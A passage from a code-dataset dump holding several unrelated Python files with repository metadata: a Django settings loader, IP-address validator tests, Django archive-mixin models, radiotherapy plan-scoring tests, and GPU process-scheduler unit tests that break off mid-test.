onlineweb4/settings/__init__.py
|
mariusaarsnes/onlineweb4
|
3495321dabfd7a7236e6d841b004e9f855b6f30e
|
[
"MIT"
] | null | null | null |
onlineweb4/settings/__init__.py
|
mariusaarsnes/onlineweb4
|
3495321dabfd7a7236e6d841b004e9f855b6f30e
|
[
"MIT"
] | null | null | null |
onlineweb4/settings/__init__.py
|
mariusaarsnes/onlineweb4
|
3495321dabfd7a7236e6d841b004e9f855b6f30e
|
[
"MIT"
] | null | null | null |
import sys
from onlineweb4.settings.django import *
from onlineweb4.settings.base import *
from onlineweb4.settings.celery import *
from onlineweb4.settings.dataporten import *
from onlineweb4.settings.django_wiki import *
from onlineweb4.settings.gsuite import *
from onlineweb4.settings.logging import *
from onlineweb4.settings.raven import *
from onlineweb4.settings.rest_framework import *
from onlineweb4.settings.stripe import *
try:
from onlineweb4.settings.local import *
except ImportError as e:
# No local settings file found.
# You can still override using environment variables.
pass
| 29.333333
| 57
| 0.798701
| 77
| 616
| 6.363636
| 0.428571
| 0.314286
| 0.493878
| 0.514286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020716
| 0.137987
| 616
| 20
| 58
| 30.8
| 0.902072
| 0.131494
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.066667
| 0.866667
| 0
| 0.866667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
1d77d8dbe1a046d7dee01deca23cd7e3ba2e010d
| 3,983
|
py
|
Python
|
pyva/tests/TestIpRules.py
|
holoyan/python-data-validation
|
e928c4131072c53cb8ace1fbaa83216f06ab6bfe
|
[
"MIT"
] | 3
|
2021-03-16T05:47:46.000Z
|
2021-03-23T17:43:55.000Z
|
pyva/tests/TestIpRules.py
|
holoyan/python-data-validation
|
e928c4131072c53cb8ace1fbaa83216f06ab6bfe
|
[
"MIT"
] | null | null | null |
pyva/tests/TestIpRules.py
|
holoyan/python-data-validation
|
e928c4131072c53cb8ace1fbaa83216f06ab6bfe
|
[
"MIT"
] | null | null | null |
import unittest
from pyva import Validator
class TestIpRules(unittest.TestCase):
def test_ipv4_and_ipv6_ips(self):
ips = [
'0.0.0.0',
'9.255.255.255',
'11.0.0.0',
'126.255.255.255',
'129.0.0.0',
'169.253.255.255',
'169.255.0.0',
'172.15.255.255',
'172.32.0.0',
'191.0.1.255',
'192.88.98.255',
'192.88.100.0',
'192.167.255.255',
'192.169.0.0',
'198.17.255.255',
'223.255.255.255',
'223.255.255.1',
'1200:0000:AB00:1234:0000:2552:7777:1313',
'21DA:D3:0:2F3B:2AA:FF:FE28:9C5A',
'FE80:0000:0000:0000:0202:B3FF:FE1E:8329'
]
for ip in ips:
v = Validator(
{
'ip': ip
},
{
'ip': 'ip'
}
)
self.assertTrue(v.passes())
def test_ipv4_and_ipv6_ips_fails(self):
ips = [
'1200:0000:AB00:1234:O000:2552:7777:1313',
'[2001:db8:0:1]:80',
'http://[2001:db8:0:1]:80',
'256.0.0.0'
]
for ip in ips:
v = Validator(
{
'ip': ip
},
{
'ip': 'ip'
}
)
self.assertTrue(v.fails())
def test_ipv4(self):
ips = [
'0.0.0.0',
'9.255.255.255',
'11.0.0.0',
'126.255.255.255',
'129.0.0.0',
'169.253.255.255',
'169.255.0.0',
'172.15.255.255',
'172.32.0.0',
'191.0.1.255',
'192.88.98.255',
'192.88.100.0',
'192.167.255.255',
'192.169.0.0',
'198.17.255.255',
'223.255.255.255',
'223.255.255.1',
]
for ip in ips:
v = Validator(
{
'ip': ip
},
{
'ip': 'ipv4'
}
)
self.assertTrue(v.passes())
def test_ipv4_fails(self):
ips = [
'256.0.0.0',
'1200::AB00:1234::2552:7777:1313',
'1200:0000:AB00:1234:O000:2552:7777:1313',
'[2001:db8:0:1]:80',
'http://[2001:db8:0:1]:80',
'1200:0000:AB00:1234:0000:2552:7777:1313',
'21DA:D3:0:2F3B:2AA:FF:FE28:9C5A',
'FE80:0000:0000:0000:0202:B3FF:FE1E:8329'
]
for ip in ips:
v = Validator(
{
'ip': ip
},
{
'ip': 'ipv4'
}
)
self.assertTrue(v.fails())
def test_ipv6(self):
ips = [
'1200:0000:AB00:1234:0000:2552:7777:1313',
'21DA:D3:0:2F3B:2AA:FF:FE28:9C5A',
'FE80:0000:0000:0000:0202:B3FF:FE1E:8329'
]
for ip in ips:
v = Validator(
{
'ip': ip
},
{
'ip': 'ipv6'
}
)
self.assertTrue(v.passes())
def test_ipv6_fails(self):
ips = [
'1200:0000:AB00:1234:O000:2552:7777:1313',
'[2001:db8:0:1]:80',
'http://[2001:db8:0:1]:80',
'256.0.0.0',
'0.0.0.0',
'9.255.255.255',
'11.0.0.0',
'126.255.255.255',
'129.0.0.0',
'169.253.255.255',
]
for ip in ips:
v = Validator(
{
'ip': ip
},
{
'ip': 'ipv6'
}
)
self.assertTrue(v.fails())
| 23.568047
| 54
| 0.342707
| 440
| 3,983
| 3.068182
| 0.154545
| 0.05037
| 0.037778
| 0.017778
| 0.905185
| 0.905185
| 0.84963
| 0.824444
| 0.824444
| 0.824444
| 0
| 0.375377
| 0.500377
| 3,983
| 169
| 55
| 23.568047
| 0.303015
| 0
| 0
| 0.671329
| 0
| 0
| 0.288153
| 0.119227
| 0
| 0
| 0
| 0
| 0.041958
| 1
| 0.041958
| false
| 0.020979
| 0.013986
| 0
| 0.062937
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
1d81d8766b0f4d868d4d8d5d72081a20263d1929
| 41
|
py
|
Python
|
boltzmann_machines/rbm/__init__.py
|
praisethemoon/boltzmann-machines
|
bc49ba2c8c6c894af55b272e1b92f9cea3576136
|
[
"MIT"
] | null | null | null |
boltzmann_machines/rbm/__init__.py
|
praisethemoon/boltzmann-machines
|
bc49ba2c8c6c894af55b272e1b92f9cea3576136
|
[
"MIT"
] | null | null | null |
boltzmann_machines/rbm/__init__.py
|
praisethemoon/boltzmann-machines
|
bc49ba2c8c6c894af55b272e1b92f9cea3576136
|
[
"MIT"
] | 1
|
2021-08-17T17:36:19.000Z
|
2021-08-17T17:36:19.000Z
|
from base_rbm import *
from rbm import *
| 13.666667
| 22
| 0.756098
| 7
| 41
| 4.285714
| 0.571429
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.195122
| 41
| 2
| 23
| 20.5
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1d96fa5225cc1a77d949911aa1a8ec6a9f0770e0
| 2,208
|
py
|
Python
|
tests/test_app/models.py
|
LucasRoesler/django-archive-mixin
|
9a78ba960aea9bbb0df8f0579425fb624af712fc
|
[
"MIT"
] | 18
|
2015-11-08T16:22:19.000Z
|
2021-07-01T10:05:02.000Z
|
tests/test_app/models.py
|
LucasRoesler/django-archive-mixin
|
9a78ba960aea9bbb0df8f0579425fb624af712fc
|
[
"MIT"
] | 2
|
2019-03-28T10:06:05.000Z
|
2020-02-11T22:59:18.000Z
|
tests/test_app/models.py
|
LucasRoesler/django-archive-mixin
|
9a78ba960aea9bbb0df8f0579425fb624af712fc
|
[
"MIT"
] | 4
|
2016-02-03T02:12:55.000Z
|
2019-04-23T22:29:07.000Z
|
from django.db import models
from django_archive_mixin.mixins import ArchiveMixin
class BaseModel(models.Model):
name = models.CharField(max_length=100, blank=True, null=True)
class NullRelatedModel(models.Model):
nullable_base = models.ForeignKey(BaseModel, blank=True, null=True)
class BaseArchiveModel(ArchiveMixin, models.Model):
name = models.CharField(max_length=100, blank=True, null=True)
class RelatedModel(models.Model):
base = models.ForeignKey(BaseArchiveModel)
null_base = models.ForeignKey(BaseArchiveModel, blank=True, null=True)
set_null_base = models.ForeignKey(
BaseArchiveModel,
blank=True, null=True, on_delete=models.deletion.SET_NULL)
set_default_base = models.ForeignKey(
BaseArchiveModel,
blank=True, null=True, on_delete=models.deletion.SET_DEFAULT)
class RelatedCousinModel(models.Model):
related = models.ForeignKey(RelatedModel)
null_related = models.ForeignKey(RelatedModel, blank=True, null=True)
set_null_related = models.ForeignKey(
RelatedModel,
blank=True, null=True, on_delete=models.deletion.SET_NULL)
set_default_related = models.ForeignKey(
RelatedModel,
blank=True, null=True, on_delete=models.deletion.SET_DEFAULT)
class RelatedArchiveModel(ArchiveMixin, models.Model):
base = models.ForeignKey(BaseArchiveModel)
null_base = models.ForeignKey(BaseArchiveModel, blank=True, null=True)
set_null_base = models.ForeignKey(
BaseArchiveModel,
blank=True, null=True, on_delete=models.deletion.SET_NULL)
set_default_base = models.ForeignKey(
BaseArchiveModel,
blank=True, null=True, on_delete=models.deletion.SET_DEFAULT)
class RelatedCousinArchiveModel(ArchiveMixin, models.Model):
related = models.ForeignKey(RelatedArchiveModel)
null_related = models.ForeignKey(
RelatedArchiveModel, blank=True, null=True)
null_related = models.ForeignKey(
RelatedArchiveModel,
blank=True, null=True, on_delete=models.deletion.SET_NULL)
set_default_related = models.ForeignKey(
RelatedArchiveModel,
blank=True, null=True, on_delete=models.deletion.SET_DEFAULT)
| 35.612903
| 74
| 0.746377
| 251
| 2,208
| 6.406375
| 0.139442
| 0.169154
| 0.121269
| 0.158582
| 0.810323
| 0.754353
| 0.752488
| 0.752488
| 0.752488
| 0.673507
| 0
| 0.003241
| 0.161685
| 2,208
| 61
| 75
| 36.196721
| 0.865478
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.044444
| 0
| 0.622222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
6398f68b09910e3fa844868578579e0f415b7d36
| 4,915
|
py
|
Python
|
tests/test_api/test_pyPlanScoringKernel.py
|
victorgabr/pps
|
dfe3fae64fd4dedde85204643f9c797c0373f96c
|
[
"BSD-3-Clause"
] | 7
|
2018-11-18T07:11:05.000Z
|
2021-05-06T21:53:40.000Z
|
tests/test_api/test_pyPlanScoringKernel.py
|
victorgabr/pps
|
dfe3fae64fd4dedde85204643f9c797c0373f96c
|
[
"BSD-3-Clause"
] | 9
|
2019-09-23T16:34:09.000Z
|
2020-05-26T18:49:43.000Z
|
tests/test_api/test_pyPlanScoringKernel.py
|
victorgabr/pps
|
dfe3fae64fd4dedde85204643f9c797c0373f96c
|
[
"BSD-3-Clause"
] | 2
|
2019-04-18T14:34:31.000Z
|
2019-06-19T19:34:33.000Z
|
import os
import pytest
from gui.api.backend import PyPlanScoringKernel
# TODO monkey patching DVH data to cut redundant calculations
def test_parse_dicom_folder(dicom_folder):
# given
p_kernel = PyPlanScoringKernel()
# when having a folder containing RS/RD/RP dicom
# then
p_kernel.parse_dicom_folder(dicom_folder)
assert p_kernel.dcm_files
def test_parse_empty_dicom_folder(tmpdir):
# given
p_kernel = PyPlanScoringKernel()
# when having a folder containing RS/RD/RP dicom
# then
with pytest.raises(FileNotFoundError):
p_kernel.parse_dicom_folder(tmpdir)
def test_setup_case(dicom_folder):
# given case files
rs_dvh = os.path.join(dicom_folder, 'RS.dcm')
file_path = os.path.join(dicom_folder, 'Scoring_criteria_2018.xlsx')
case_name = 'BiLateralLungSBRTCase'
# when instantiate
p_kernel = PyPlanScoringKernel()
p_kernel.setup_case(rs_dvh, file_path, case_name)
assert p_kernel.case is not None
def test_setup_dvh_calculation(dicom_folder, ini_file_path):
# given case files
rs_dvh = os.path.join(dicom_folder, 'RS.dcm')
file_path = os.path.join(dicom_folder, 'Scoring_criteria_2018.xlsx')
case_name = 'BiLateralLungSBRTCase'
# when instantiate
p_kernel = PyPlanScoringKernel()
# if not setup case before setup dvh calculator
p_kernel.setup_dvh_calculation(ini_file_path)
# then
assert p_kernel.dvh_calculator is None
# when setup case
p_kernel = PyPlanScoringKernel()
p_kernel.setup_case(rs_dvh, file_path, case_name)
p_kernel.setup_dvh_calculation(ini_file_path)
# then
assert p_kernel.dvh_calculator is not None
def test_setup_planning_item(dicom_folder, ini_file_path):
# given case files
rs_dvh = os.path.join(dicom_folder, 'RS.dcm')
file_path = os.path.join(dicom_folder, 'Scoring_criteria_2018.xlsx')
case_name = 'BiLateralLungSBRTCase'
# when instantiate
p_kernel = PyPlanScoringKernel()
p_kernel.setup_planing_item()
assert p_kernel.planning_item is None
p_kernel.parse_dicom_folder(dicom_folder)
p_kernel.setup_planing_item()
assert p_kernel.planning_item is None
p_kernel.setup_case(rs_dvh, file_path, case_name)
p_kernel.setup_planing_item()
assert p_kernel.planning_item is None
p_kernel.setup_dvh_calculation(ini_file_path)
p_kernel.setup_planing_item()
assert p_kernel.planning_item is not None
def test_calculate_dvh(dicom_folder, ini_file_path):
# given case files
rs_dvh = os.path.join(dicom_folder, 'RS.dcm')
file_path = os.path.join(dicom_folder, 'Scoring_criteria_2018.xlsx')
case_name = 'BiLateralLungSBRTCase'
# when instantiate
p_kernel = PyPlanScoringKernel()
p_kernel.parse_dicom_folder(dicom_folder)
p_kernel.setup_case(rs_dvh, file_path, case_name)
p_kernel.setup_dvh_calculation(ini_file_path)
p_kernel.setup_planing_item()
p_kernel.calculate_dvh()
assert p_kernel.dvh_data
def test_calc_plan_score(dicom_folder, ini_file_path):
# given case files
rs_dvh = os.path.join(dicom_folder, 'RS.dcm')
file_path = os.path.join(dicom_folder, 'Scoring_criteria_2018.xlsx')
case_name = 'BiLateralLungSBRTCase'
# when instantiate
p_kernel = PyPlanScoringKernel()
p_kernel.parse_dicom_folder(dicom_folder)
p_kernel.setup_case(rs_dvh, file_path, case_name)
p_kernel.setup_dvh_calculation(ini_file_path)
p_kernel.setup_planing_item()
p_kernel.calculate_dvh()
p_kernel.calc_plan_score()
assert not p_kernel._report_data_frame.empty
assert round(p_kernel._total_score) == round(90.01)
# save report data
p_kernel.save_report_data()
def test_calc_plan_complexity(test_case, dicom_folder, ini_file_path):
# given case files
rs_dvh = os.path.join(dicom_folder, 'RS.dcm')
file_path = os.path.join(dicom_folder, 'Scoring_criteria_2018.xlsx')
case_name = 'BiLateralLungSBRTCase'
# when instantiate
p_kernel = PyPlanScoringKernel()
p_kernel.parse_dicom_folder(dicom_folder)
p_kernel.setup_case(rs_dvh, file_path, case_name)
p_kernel.setup_dvh_calculation(ini_file_path)
p_kernel.setup_planing_item()
# calculate plan complexity
p_kernel.calc_plan_complexity()
test_case.assertAlmostEqual(p_kernel.plan_complexity, 0.166503597706, places=3)
def test_save_dvh_data(dicom_folder, ini_file_path):
# given case files
rs_dvh = os.path.join(dicom_folder, 'RS.dcm')
file_path = os.path.join(dicom_folder, 'Scoring_criteria_2018.xlsx')
case_name = 'BiLateralLungSBRTCase'
# when instantiate
p_kernel = PyPlanScoringKernel()
p_kernel.parse_dicom_folder(dicom_folder)
p_kernel.setup_case(rs_dvh, file_path, case_name)
p_kernel.setup_dvh_calculation(ini_file_path)
p_kernel.setup_planing_item()
p_kernel.calculate_dvh()
p_kernel.save_dvh_data()
| 29.431138
| 83
| 0.752391
| 706
| 4,915
| 4.852691
| 0.114731
| 0.118506
| 0.077058
| 0.061296
| 0.823117
| 0.780502
| 0.768827
| 0.758903
| 0.758903
| 0.758903
| 0
| 0.011233
| 0.166836
| 4,915
| 166
| 84
| 29.608434
| 0.825397
| 0.107426
| 0
| 0.706522
| 0
| 0
| 0.085111
| 0.075476
| 0
| 0
| 0
| 0.006024
| 0.130435
| 1
| 0.097826
| false
| 0
| 0.032609
| 0
| 0.130435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
63d51778576b8b39481fa2803d29ee86340782ff
| 22,202
|
py
|
Python
|
replik/scheduler/scheduler_test.py
|
jutanke/replik
|
594fc5ae4e1d1403507334c3827f5a4b68da9b7e
|
[
"MIT"
] | 8
|
2021-02-16T08:51:08.000Z
|
2021-07-05T09:04:29.000Z
|
replik/scheduler/scheduler_test.py
|
jutanke/replik
|
594fc5ae4e1d1403507334c3827f5a4b68da9b7e
|
[
"MIT"
] | 5
|
2021-06-30T13:46:04.000Z
|
2021-12-08T14:14:02.000Z
|
replik/scheduler/scheduler_test.py
|
jutanke/replik
|
594fc5ae4e1d1403507334c3827f5a4b68da9b7e
|
[
"MIT"
] | 1
|
2021-11-17T13:06:18.000Z
|
2021-11-17T13:06:18.000Z
|
import unittest
import replik.scheduler.scheduler as SCHEDULER
import replik.scheduler.schedule as SCHED
from replik.scheduler.resource_monitor import ResourceMonitor
from os.path import isfile
class TestSchedulingStep(unittest.TestCase):
def assert_is_running(self, proc):
self.assertFalse(isfile(SCHEDULER.get_mark_file_staging(proc.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file(proc.uid)))
self.assertEqual(proc.place, SCHED.Place.RUNNING)
def assert_is_staging(self, proc):
self.assertTrue(isfile(SCHEDULER.get_mark_file_staging(proc.uid)))
self.assertFalse(isfile(SCHEDULER.get_mark_file(proc.uid)))
self.assertEqual(proc.place, SCHED.Place.STAGING)
def assert_is_gone(self, proc):
self.assertFalse(isfile(SCHEDULER.get_mark_file_staging(proc.uid)))
self.assertFalse(isfile(SCHEDULER.get_mark_file(proc.uid)))
self.assertEqual(proc.place, SCHED.Place.KILLED)
def test_scheduling_without_gpu(self):
FAKE_DOCKER = {}
def fun_docker_kill(uid):
assert uid in FAKE_DOCKER, f"{uid} not in: " + str(FAKE_DOCKER.keys())
del FAKE_DOCKER[uid]
mon = ResourceMonitor(cpu_count=5, gpu_count=5, mem_gb=100)
scheduler = SCHEDULER.Scheduler(
mon, fun_docker_kill=fun_docker_kill, max_id=100
)
CUR_TIME = 0
proc1 = scheduler.add_process_to_staging(
{"cpus": 1, "gpus": 0, "memory": "10g"}, cur_time_in_s=CUR_TIME
)
CUR_TIME += 1
scheduler.scheduling_step(
running_docker_containers=[], current_time_in_s=CUR_TIME
)
self.assertEqual(0, len(scheduler.STAGING_QUEUE))
self.assertEqual(1, len(scheduler.RUNNING_QUEUE))
def test_scheduling_step(self):
FAKE_DOCKER = {}
def fun_docker_kill(uid):
assert uid in FAKE_DOCKER, f"{uid} not in: " + str(FAKE_DOCKER.keys())
del FAKE_DOCKER[uid]
mon = ResourceMonitor(cpu_count=5, gpu_count=5, mem_gb=100)
scheduler = SCHEDULER.Scheduler(
mon, fun_docker_kill=fun_docker_kill, max_id=100
)
self.assertEqual(100, len(scheduler.FREE_IDS))
self.assertEqual(0, len(scheduler.USED_IDS))
proc1 = scheduler.add_process_to_staging(
{"cpus": 1, "gpus": 1, "memory": "10g"}, cur_time_in_s=0
)
self.assertEqual(99, len(scheduler.FREE_IDS))
self.assertEqual(1, len(scheduler.USED_IDS))
proc2 = scheduler.add_process_to_staging(
{"cpus": 1, "gpus": 1, "memory": "10g"}, cur_time_in_s=0
)
self.assertEqual(98, len(scheduler.FREE_IDS))
self.assertEqual(2, len(scheduler.USED_IDS))
self.assertEqual(2, len(scheduler.STAGING_QUEUE))
self.assertEqual(0, len(scheduler.RUNNING_QUEUE))
for proc in scheduler.STAGING_QUEUE:
self.assertEqual(SCHED.Place.STAGING, proc.place)
scheduler.scheduling_step(running_docker_containers=[], current_time_in_s=0)
self.assertTrue(isfile(SCHEDULER.get_mark_file(proc1.uid)))
FAKE_DOCKER[proc1.container_name()] = "running"
self.assertTrue(isfile(SCHEDULER.get_mark_file(proc2.uid)))
FAKE_DOCKER[proc2.container_name()] = "running"
self.assertEqual(0, len(scheduler.STAGING_QUEUE))
self.assertEqual(2, len(scheduler.RUNNING_QUEUE))
for proc, gpus in scheduler.RUNNING_QUEUE:
self.assertEqual(SCHED.Place.RUNNING, proc.place)
def test_scheduling_client_fails_to_run(self):
FAKE_DOCKER = {}
def fun_docker_kill(uid):
assert uid in FAKE_DOCKER
del FAKE_DOCKER[uid]
mon = ResourceMonitor(cpu_count=5, gpu_count=5, mem_gb=100)
scheduler = SCHEDULER.Scheduler(
mon, fun_docker_kill=fun_docker_kill, max_id=100
)
self.assertEqual(100, len(scheduler.FREE_IDS))
self.assertEqual(0, len(scheduler.USED_IDS))
proc1 = scheduler.add_process_to_staging(
{"cpus": 1, "gpus": 1, "memory": "10g"}
)
self.assertEqual(99, len(scheduler.FREE_IDS))
self.assertEqual(1, len(scheduler.USED_IDS))
proc2 = scheduler.add_process_to_staging(
{"cpus": 1, "gpus": 1, "memory": "10g"}
)
self.assertTrue(isfile(SCHEDULER.get_mark_file_staging(proc2.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file_staging(proc1.uid)))
self.assertEqual(98, len(scheduler.FREE_IDS))
self.assertEqual(2, len(scheduler.USED_IDS))
self.assertEqual(2, len(scheduler.STAGING_QUEUE))
self.assertEqual(0, len(scheduler.RUNNING_QUEUE))
for proc in scheduler.STAGING_QUEUE:
self.assertEqual(SCHED.Place.STAGING, proc.place)
# -- step 1 --
scheduler.scheduling_step(running_docker_containers=[], current_time_in_s=0)
self.assertFalse(isfile(SCHEDULER.get_mark_file_staging(proc2.uid)))
self.assertFalse(isfile(SCHEDULER.get_mark_file_staging(proc1.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file(proc1.uid)))
# proc1 does "crash" and is not scheduled!
# This has to be picked-up in the next scheduling step!
self.assertTrue(isfile(SCHEDULER.get_mark_file(proc2.uid)))
FAKE_DOCKER[proc2.container_name()] = "running"
self.assertEqual(0, len(scheduler.STAGING_QUEUE))
self.assertEqual(2, len(scheduler.RUNNING_QUEUE))
# -- step 2 --
cnt = list(FAKE_DOCKER.keys())
scheduler.scheduling_step(running_docker_containers=cnt, current_time_in_s=60)
for proc, gpus in scheduler.RUNNING_QUEUE:
self.assertEqual(SCHED.Place.RUNNING, proc.place)
self.assertEqual(0, len(scheduler.STAGING_QUEUE))
self.assertEqual(1, len(scheduler.RUNNING_QUEUE))
self.assertTrue(isfile(SCHEDULER.get_mark_file(proc2.uid)))
self.assertFalse(isfile(SCHEDULER.get_mark_file(proc1.uid)))
# -- step 3 --
scheduler.schedule_uid_for_killing(proc2.uid)
cnt = list(FAKE_DOCKER.keys())
scheduler.scheduling_step(running_docker_containers=cnt, current_time_in_s=120)
self.assertEqual(0, len(scheduler.STAGING_QUEUE))
self.assertEqual(0, len(scheduler.RUNNING_QUEUE))
self.assertEqual(0, len(scheduler.KILLING_QUEUE))
def test_full_scheduling_cycle(self):
FAKE_DOCKER = {}
def fun_docker_kill(uid):
assert uid in FAKE_DOCKER, f"{uid} not in: " + str(FAKE_DOCKER.keys())
del FAKE_DOCKER[uid]
mon = ResourceMonitor(cpu_count=20, gpu_count=3, mem_gb=100)
scheduler = SCHEDULER.Scheduler(
mon, fun_docker_kill=fun_docker_kill, max_id=100
)
self.assertEqual(100, len(scheduler.FREE_IDS))
self.assertEqual(0, len(scheduler.USED_IDS))
# -- add proc1 --
proc1 = scheduler.add_process_to_staging(
{"cpus": 5, "gpus": 2, "memory": "10g"}, cur_time_in_s=0
)
self.assertTrue(isfile(SCHEDULER.get_mark_file_staging(proc1.uid)))
# = = = = = = = = = = = = = = = = =
# S T E P 1
# = = = = = = = = = = = = = = = = =
scheduler.scheduling_step(list(FAKE_DOCKER.keys()), current_time_in_s=10)
self.assertEqual(0, len(scheduler.STAGING_QUEUE))
self.assertEqual(1, len(scheduler.RUNNING_QUEUE))
# -- check proc1 --
self.assertFalse(isfile(SCHEDULER.get_mark_file_staging(proc1.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file(proc1.uid)))
FAKE_DOCKER[proc1.container_name()] = "RUNNING"
# -- add proc2 & proc3 --
proc2 = scheduler.add_process_to_staging(
{"cpus": 5, "gpus": 2, "memory": "10g"}, cur_time_in_s=20
)
proc3 = scheduler.add_process_to_staging(
{
"cpus": 5,
"gpus": 1,
"memory": "10g",
"minimum_required_running_hours": 2,
},
cur_time_in_s=30,
)
self.assertTrue(isfile(SCHEDULER.get_mark_file_staging(proc2.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file_staging(proc3.uid)))
self.assertEqual(2, len(scheduler.STAGING_QUEUE))
self.assertEqual(1, len(scheduler.RUNNING_QUEUE))
# = = = = = = = = = = = = = = = = =
# S T E P 2
# = = = = = = = = = = = = = = = = =
scheduler.scheduling_step(list(FAKE_DOCKER.keys()), current_time_in_s=60)
self.assertEqual(1, len(scheduler.STAGING_QUEUE))
self.assertEqual(2, len(scheduler.RUNNING_QUEUE))
# -- check proc1 & proc2 & pro3 --
self.assertFalse(isfile(SCHEDULER.get_mark_file_staging(proc1.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file(proc1.uid)))
self.assertFalse(isfile(SCHEDULER.get_mark_file_staging(proc3.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file(proc3.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file_staging(proc2.uid)))
self.assertFalse(isfile(SCHEDULER.get_mark_file(proc2.uid)))
FAKE_DOCKER[proc3.container_name()] = "RUNNING"
# -- add proc4 & proc5 --
proc4 = scheduler.add_process_to_staging(
{"cpus": 5, "gpus": 1, "memory": "10g"}, cur_time_in_s=70
)
proc5 = scheduler.add_process_to_staging(
{"cpus": 5, "gpus": 1, "memory": "10g"}, cur_time_in_s=80
)
self.assertTrue(isfile(SCHEDULER.get_mark_file_staging(proc4.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file_staging(proc5.uid)))
self.assertEqual(3, len(scheduler.STAGING_QUEUE))
self.assertEqual(2, len(scheduler.RUNNING_QUEUE))
# current status:
# RUNNING: [p1, p3]
# STAGING: [p2, p4, p5]
# = = = = = = = = = = = = = = = = =
# S T E P 3
# = = = = = = = = = = = = = = = = =
# do nothing...
scheduler.scheduling_step(list(FAKE_DOCKER.keys()), current_time_in_s=160)
self.assertEqual(3, len(scheduler.STAGING_QUEUE))
self.assertEqual(2, len(scheduler.RUNNING_QUEUE))
self.assertFalse(isfile(SCHEDULER.get_mark_file_staging(proc1.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file(proc1.uid)))
self.assertFalse(isfile(SCHEDULER.get_mark_file_staging(proc3.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file(proc3.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file_staging(proc2.uid)))
self.assertFalse(isfile(SCHEDULER.get_mark_file(proc2.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file_staging(proc4.uid)))
self.assertFalse(isfile(SCHEDULER.get_mark_file(proc4.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file_staging(proc5.uid)))
self.assertFalse(isfile(SCHEDULER.get_mark_file(proc5.uid)))
# = = = = = = = = = = = = = = = = =
# S T E P 4
# = = = = = = = = = = = = = = = = =
# more than 1h has passed: lets re-schedule!
# * p1 has to be killed and re-scheduled
# * p3 has to remain as it is not expired yet
# * p2 has to be scheduled!
scheduler.scheduling_step(
list(FAKE_DOCKER.keys()), current_time_in_s=160 + 60 * 60
)
self.assertEqual(3, len(scheduler.STAGING_QUEUE))
self.assertEqual(2, len(scheduler.RUNNING_QUEUE))
FAKE_DOCKER[proc2.container_name()] = "Running"
self.assertFalse(isfile(SCHEDULER.get_mark_file_staging(proc3.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file(proc3.uid)))
self.assertFalse(isfile(SCHEDULER.get_mark_file_staging(proc2.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file(proc2.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file_staging(proc1.uid)))
self.assertFalse(isfile(SCHEDULER.get_mark_file(proc1.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file_staging(proc4.uid)))
self.assertFalse(isfile(SCHEDULER.get_mark_file(proc4.uid)))
self.assertTrue(isfile(SCHEDULER.get_mark_file_staging(proc5.uid)))
self.assertFalse(isfile(SCHEDULER.get_mark_file(proc5.uid)))
# current status:
# RUNNING: [p3, p2(2x)]
# STAGING: [p4, p5, p1(2x)]
# = = = = = = = = = = = = = = = = =
# S T E P 5
# = = = = = = = = = = = = = = = = =
# more than 3h has passed: lets re-schedule!
# * kill p2
# * schedule p4, p5, keep p3
scheduler.scheduling_step(
list(FAKE_DOCKER.keys()), current_time_in_s=160 + 60 * 60 * 3
)
self.assertEqual(2, len(scheduler.STAGING_QUEUE))
self.assertEqual(3, len(scheduler.RUNNING_QUEUE))
self.assert_is_staging(proc1)
self.assert_is_staging(proc2)
